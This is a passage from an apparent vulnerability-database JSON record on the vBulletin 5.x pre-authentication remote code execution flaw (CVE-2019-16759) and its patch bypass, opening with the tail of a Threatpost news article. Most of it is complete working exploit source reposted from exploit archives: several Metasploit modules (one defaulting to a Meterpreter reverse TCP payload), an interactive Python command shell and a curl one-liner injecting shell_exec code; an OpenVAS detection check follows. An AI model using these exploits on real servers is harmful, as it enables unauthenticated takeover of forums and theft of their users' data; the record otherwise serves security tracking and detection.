\u201cYes\u201d\n 5. Click \u201cSave\u201d\n\nOnline forums are a popular target for hackers because of they typically have a wide and diverse user base and store a large amount of personally identifiable information about those users.\n\nIndeed, hackers wasted no time in using Etemadieh\u2019s bypass to try to hack into the forum at the DEF CON security conference, according to a [post on Twitter](<https://twitter.com/thedarktangent/status/1292813958332596224>) by DEFCON and Black Hat founder [Jeff Moss](<DEF%20CON%20and%20Black%20Hat>). However, administrators quickly applied Etemadieh\u2019s advice to disable PHP to thwart the attack, he tweeted.\n\n\u201cDisable PHP rendering to protect yourself until patched!\u201d Moss advised.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "modified": "2020-08-11T12:09:30", "published": "2020-08-11T12:09:30", "id": "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "href": "https://threatpost.com/researcher-publishes-bypass-for-patch-for-vbulletin-0-day-flaw/158232/", "type": "threatpost", "title": "Researcher Publishes Patch Bypass for vBulletin 0-Day", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-04T07:54:27", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-10-01T00:00:00", "title": "vBulletin 5.x - Remote Command Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-10-01T00:00:00", "id": "1337DAY-ID-33300", "href": "https://0day.today/exploit/description/33300", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\r\n 'Description' => %q{\r\n vBulletin 5.x 0day pre-auth RCE exploit.\r\n This should work on all versions from 5.0.0 till 5.5.4\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Reported by: anonymous', # reported by\r\n 'Original exploit by: anonymous', # original exploit\r\n 'Metasploit mod by: r00tpgp', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2019-16759'],\r\n ['EDB', 'NA'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Sep 23 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' => \r\n {\r\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\r\n }\r\n })\r\n\r\n if res && res.body && res.body.include?('h4x0000r4l1f4')\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending payload.....\")\r\n resp = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' =>\r\n {\r\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\r\n\t 'widgetConfig[code]' => payload.encoded,\r\n }\r\n })\r\n #unless resp and resp.code == 200\r\n # fail_with(Failure::Unknown, \"Exploit failed.\")\r\n #end\r\n\r\n #print_good(\"Success!\")\r\n #print_line(resp.body)\r\n\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33300"}, {"lastseen": "2019-12-11T17:03:43", "description": "This Metasploit module exploits vBulletin versions 5.x through 5.5.4 leveraging a remote command execution vulnerability via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.", "edition": 1, "published": "2019-12-11T00:00:00", "title": "vBulletin 5.5.4 Remote Command Execution Exploit #RCE", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-12-11T00:00:00", "id": "1337DAY-ID-33648", "href": "https://0day.today/exploit/description/33648", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin widgetConfig RCE',\r\n 'Description' => %q{\r\n vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\r\n parameter in an ajax/render/widget_php routestring POST request.\r\n },\r\n 'Author' => [\r\n 'unknown', # discovered by an unknown sender.\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # this module.\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-16759'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html']\r\n ],\r\n 'DisclosureDate' => '2019-09-23',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'windows'],\r\n 'Arch' => [ARCH_CMD, ARCH_PHP],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n ['Meterpreter (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => [ARCH_PHP],\r\n 'Type' => :php_memory,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (CMD In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ['Windows (CMD In-Memory)',\r\n 'Platform' => 'windows',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :windows_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/windows/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\r\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n end\r\n\r\n def cmd_payload(command)\r\n return(\"echo #{datastore['PHP_CMD']}('#{command}'); exit;\")\r\n end\r\n\r\n def execute_command(command)\r\n response = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'encode_params' => true,\r\n 'vars_post' => {\r\n 'routestring' => 'ajax/render/widget_php',\r\n 'widgetConfig[code]' => command\r\n }\r\n })\r\n if (response) && (response.body)\r\n return response\r\n end\r\n\r\n return false\r\n end\r\n\r\n def check\r\n rand_str = Rex::Text.rand_text_alpha(8)\r\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\r\n if received && received.body.include?(rand_str)\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n end\r\n vprint_good(\"The target appears to be vulnerable.\")\r\n\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n case target['Type']\r\n when :unix_cmd, :windows_cmd\r\n cmd = cmd_payload(payload.encoded)\r\n vprint_status(\"Generated command payload: #{cmd}\")\r\n\r\n received = execute_command(cmd)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\r\n print_warning('Dumping command output in body response')\r\n if received.body.empty?\r\n print_error('Empty response, no command output')\r\n return\r\n end\r\n print_line(\"#{received.body}\")\r\n end\r\n\r\n when :php_memory\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n execute_command(payload.encoded)\r\n end\r\n end\r\nend\n\n# 0day.today [2019-12-11] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33648"}, {"lastseen": "2020-08-14T22:01:00", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2020-08-12T00:00:00", "title": "vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "1337DAY-ID-34823", "href": "https://0day.today/exploit/description/34823", "sourceData": "# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\r\n# Exploit Author: @zenofex\r\n# Vendor Homepage: https://www.vbulletin.com/\r\n# Software Link: None\r\n# Version: 5.4.5 through 5.6.2\r\n# Tested on: vBulletin 5.6.2 on Ubuntu 19.04\r\n# CVE : None\r\n\r\n# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code\r\n# execution vulnerability caused by incomplete patching of the previous\r\n# \"CVE-2019-16759\" RCE. This logic bug allows for a single pre-auth\r\n# request to execute PHP code on a target vBulletin forum.\r\n\r\n#More info can be found at:\r\n#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\r\n\r\n\r\n#!/usr/bin/env python3\r\n# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex\r\n\r\nimport argparse\r\nimport requests\r\nimport sys\r\n\r\ndef run_exploit(vb_loc, shell_cmd):\r\n post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd}\r\n r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)\r\n return r.text\r\n\r\nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')\r\nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')\r\nARGS = ap.parse_args()\r\n\r\nwhile True:\r\n try:\r\n cmd = input(\"vBulletin5$ \")\r\n print(run_exploit(ARGS.location, cmd))\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\nClosing shell...\")\r\n except Exception as e:\r\n sys.exit(str(e))\n\n# 0day.today [2020-08-14] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34823"}, {"lastseen": "2020-08-15T00:05:04", "description": "This Metasploit module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the widget_tabbedcontainer_tab_panel template while also providing the widget_php argument. This causes the former template to load the latter bypassing filters originally put in place to address CVE-2019-16759. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\r ", "edition": 1, "published": "2020-08-12T00:00:00", "title": "vBulletin 5.x Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7373", "CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "1337DAY-ID-34826", "href": "https://0day.today/exploit/description/34826", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n\r\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',\r\n 'Description' => %q{\r\n This module exploits a logic bug within the template rendering code in vBulletin 5.x.\r\n The module uses the vBulletin template rendering functionality to render the\r\n 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\r\n This causes the former template to load the latter bypassing filters originally put in place\r\n to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\r\n allowing the module to achieve PHP remote code execution on the target. This module has been\r\n tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\r\n },\r\n 'Author' => [\r\n 'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module\r\n ],\r\n 'References' => [\r\n ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],\r\n ['CVE', '2020-7373']\r\n ],\r\n 'DisclosureDate' => '2020-08-09',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'windows'],\r\n 'Arch' => [ARCH_CMD, ARCH_PHP],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Meterpreter (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => [ARCH_PHP],\r\n 'Type' => :php_memory,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\r\n 'DisablePayloadHandler' => false\r\n }\r\n ],\r\n [\r\n 'Unix (CMD In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => true\r\n }\r\n ],\r\n [\r\n 'Windows (CMD In-Memory)',\r\n 'Platform' => 'windows',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :windows_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/windows/generic',\r\n 'DisablePayloadHandler' => true\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS]\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\r\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\r\n ])\r\n\r\n end\r\n\r\n def cmd_payload(command)\r\n \"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\"\r\n end\r\n\r\n def execute_command(command)\r\n response = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),\r\n 'encode_params' => true,\r\n 'vars_post' => {\r\n 'subWidgets[0][template]' => 'widget_php',\r\n 'subWidgets[0][config][code]' => command\r\n }\r\n })\r\n if response && response.body\r\n return response\r\n end\r\n\r\n false\r\n end\r\n\r\n def check\r\n rand_str = Rex::Text.rand_text_alpha(8)\r\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\r\n if received && received.body.include?(rand_str)\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n case target['Type']\r\n when :unix_cmd, :windows_cmd\r\n cmd = cmd_payload(payload.encoded)\r\n vprint_status(\"Generated command payload: #{cmd}\")\r\n\r\n received = execute_command(cmd)\r\n if received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\r\n print_warning('Dumping command output in body response')\r\n if received.body.empty?\r\n print_error('Empty response, no command output')\r\n return\r\n end\r\n print_line(received.body.to_s)\r\n end\r\n\r\n when :php_memory\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n execute_command(payload.encoded)\r\n end\r\n end\r\nend\n\n# 0day.today [2020-08-14] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34826"}], "openvas": [{"lastseen": "2020-04-16T15:51:53", "description": "vBulletin is prone to an unauthenticated remote code execution vulnerability.", "edition": 8, "published": "2019-09-25T00:00:00", "title": "vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-16759"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310142932", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142932", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:vbulletin:vbulletin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142932\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-25 04:05:17 +0000 (Wed, 25 Sep 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-16759\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_name(\"vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"vbulletin_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"vbulletin/detected\");\n\n script_tag(name:\"summary\", value:\"vBulletin is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP POST request and checks the response.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute arbitrary code on the system as the\n user running vBulletin.\");\n\n script_tag(name:\"affected\", value:\"vBulletin versions 5.x before 5.5.2 Patch Level 1, 5.5.3 before 5.5.3 Patch Level 1\n and 5.5.4 before 5.5.4 Patch Level 1.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.5.2 Patch Level 1, 5.5.3 Patch Level 1, 5.5.4 Patch Level 1 or later.\n Please see the referenced vendor advisory for more information.\");\n\n script_xref(name:\"URL\", value:\"https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4\");\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2019/Sep/31\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/\";\n\nheaders = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nvt_strings = get_vt_strings();\n\ncmds = exploit_commands();\nforeach pattern(keys(cmds)) {\n cmd = cmds[pattern];\n final_checks[pattern] = \"shell_exec%28%27\" + cmd;\n}\n\n# nb: shell_exec might be disabled so use bin2hex in addition to it.\nfinal_checks[vt_strings[\"default_rand_hex\"]] = \"bin2hex%28%27\" + vt_strings[\"default_rand\"];\n\nforeach pattern(keys(final_checks)) {\n\n cmd = final_checks[pattern];\n data = \"routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+\" + cmd + \"%27%29%3B+exit%3B\";\n\n req = http_post_put_req(port: port, url: url, data: data, add_headers: headers);\n res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\n if (egrep(pattern: pattern, string: res)) {\n\n info['1. \"HTTP POST\" body'] = data;\n info['2. URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );\n info['3. Used command'] = cmd;\n info['4. Expected result'] = pattern;\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table(array: info) + '\\n\\n';\n report += 'it was possible to execute a command on the target.';\n report += '\\n\\nResult: ' + res;\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-08-12T01:26:42", "description": "", "published": "2020-08-11T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2020-08-11T00:00:00", "id": "PACKETSTORM:158829", "href": "https://packetstormsecurity.com/files/158829/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`#!/bin/bash \n# \n# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex \n#<br># Usage ./exploit <site> <shell-command><br> \n# Urlencode cmd \nCMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),\"\\n\"'` \n \n# Send request \ncurl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec(\"'+$CMD+'\");exit;' \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/158829/vbulletin50-exec.sh.txt"}, {"lastseen": "2019-10-02T22:58:30", "description": "", "published": "2019-09-28T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Pre-Auth Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-09-28T00:00:00", "id": "PACKETSTORM:154648", "href": "https://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit', \n'Description' => %q{ \nvBulletin 5.x 0day pre-auth RCE exploit. \nThis should work on all versions from 5.0.0 till 5.5.4 \n}, \n'Platform' => 'php', \n'License' => MSF_LICENSE, \n'Author' => [ \n'Reported by: anonymous', # reported by \n'Original exploit by: anonymous', # original exploit \n'Metasploit mod by: r00tpgp', # metasploit module \n], \n'Payload' => \n{ \n'BadChars' => \"\\x22\", \n}, \n'References' => \n[ \n['CVE', 'CVE-2019-16759'], \n['EDB', 'NA'], \n['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'], \n['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759'] \n], \n'Arch' => ARCH_PHP, \n'Targets' => [ \n[ 'Automatic Targeting', { 'auto' => true } ], \n# ['vBulletin 5.0.X', {'chain' => 'vB_Database'}], \n# ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], \n], \n'DisclosureDate' => 'Sep 23 2019', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"]) \n]) \n \nend \n \ndef check \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'), \n'encode_params' => false, \n'vars_post' => \n{ \n'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\", \n} \n}) \n \nif res && res.body && res.body.include?('h4x0000r4l1f4') \nreturn Exploit::CheckCode::Vulnerable \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Sending payload.....\") \nresp = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'), \n'encode_params' => false, \n'vars_post' => \n{ \n#'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\", \n'widgetConfig[code]' => payload.encoded, \n} \n}) \n#unless resp and resp.code == 200 \n# fail_with(Failure::Unknown, \"Exploit failed.\") \n#end \n \n#print_good(\"Success!\") \n#print_line(resp.body) \n \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154648/vbulletin_rce.rb.txt"}, {"lastseen": "2019-12-12T23:36:08", "description": "", "published": "2019-12-10T00:00:00", "type": "packetstorm", "title": "vBulletin 5.5.4 Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-12-10T00:00:00", "id": "PACKETSTORM:155633", "href": "https://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'vBulletin widgetConfig RCE', \n'Description' => %q{ \nvBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] \nparameter in an ajax/render/widget_php routestring POST request. \n}, \n'Author' => [ \n'unknown', # discovered by an unknown sender. \n'mekhalleh (RAMELLA S\u00e9bastien)' # this module. \n], \n'References' => [ \n['CVE', '2019-16759'], \n['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'], \n['URL', 'https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html'] \n], \n'DisclosureDate' => '2019-09-23', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'windows'], \n'Arch' => [ARCH_CMD, ARCH_PHP], \n'Privileged' => true, \n'Targets' => [ \n['Meterpreter (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => [ARCH_PHP], \n'Type' => :php_memory, \n'Payload' => { \n'BadChars' => \"\\x22\", \n}, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (CMD In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n['Windows (CMD In-Memory)', \n'Platform' => 'windows', \n'Arch' => ARCH_CMD, \n'Type' => :windows_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/generic', \n'DisablePayloadHandler' => 'true' \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { 